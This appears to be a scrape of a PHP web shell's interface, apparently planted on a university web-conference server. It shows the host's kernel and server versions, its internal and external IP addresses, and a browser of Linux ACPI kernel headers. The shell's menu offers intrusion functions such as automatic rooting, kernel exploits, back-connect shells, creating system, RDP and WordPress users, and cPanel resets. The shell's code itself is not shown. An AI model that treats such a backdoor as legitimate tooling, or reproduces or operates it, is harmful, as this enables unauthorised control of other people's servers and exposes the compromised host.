Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.17.76.163
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-204 /
include /
acpi /
[ HOME SHELL ]
Name
Size
Permission
Action
platform
[ DIR ]
drwxr-xr-x
acbuffer.h
8.62
KB
-rw-r--r--
acconfig.h
7.36
KB
-rw-r--r--
acexcep.h
16.87
KB
-rw-r--r--
acnames.h
2.15
KB
-rw-r--r--
acoutput.h
16.37
KB
-rw-r--r--
acpi.h
1.33
KB
-rw-r--r--
acpi_bus.h
18.81
KB
-rw-r--r--
acpi_drivers.h
3.59
KB
-rw-r--r--
acpi_io.h
713
B
-rw-r--r--
acpi_lpat.h
1.16
KB
-rw-r--r--
acpi_numa.h
623
B
-rw-r--r--
acpiosxf.h
11.35
KB
-rw-r--r--
acpixf.h
30.52
KB
-rw-r--r--
acrestyp.h
18.84
KB
-rw-r--r--
actbl.h
18.35
KB
-rw-r--r--
actbl1.h
40.34
KB
-rw-r--r--
actbl2.h
45.51
KB
-rw-r--r--
actbl3.h
20.88
KB
-rw-r--r--
actypes.h
41.39
KB
-rw-r--r--
acuuid.h
2.43
KB
-rw-r--r--
apei.h
1.34
KB
-rw-r--r--
battery.h
561
B
-rw-r--r--
button.h
621
B
-rw-r--r--
cppc_acpi.h
3.14
KB
-rw-r--r--
ghes.h
2.94
KB
-rw-r--r--
hed.h
370
B
-rw-r--r--
nfit.h
351
B
-rw-r--r--
pcc.h
651
B
-rw-r--r--
pdc_intel.h
1.02
KB
-rw-r--r--
processor.h
11.66
KB
-rw-r--r--
reboot.h
201
B
-rw-r--r--
video.h
2.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : button.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef ACPI_BUTTON_H #define ACPI_BUTTON_H #include <linux/notifier.h> #if IS_ENABLED(CONFIG_ACPI_BUTTON) extern int acpi_lid_notifier_register(struct notifier_block *nb); extern int acpi_lid_notifier_unregister(struct notifier_block *nb); extern int acpi_lid_open(void); #else static inline int acpi_lid_notifier_register(struct notifier_block *nb) { return 0; } static inline int acpi_lid_notifier_unregister(struct notifier_block *nb) { return 0; } static inline int acpi_lid_open(void) { return 1; } #endif /* IS_ENABLED(CONFIG_ACPI_BUTTON) */ #endif /* ACPI_BUTTON_H */
Close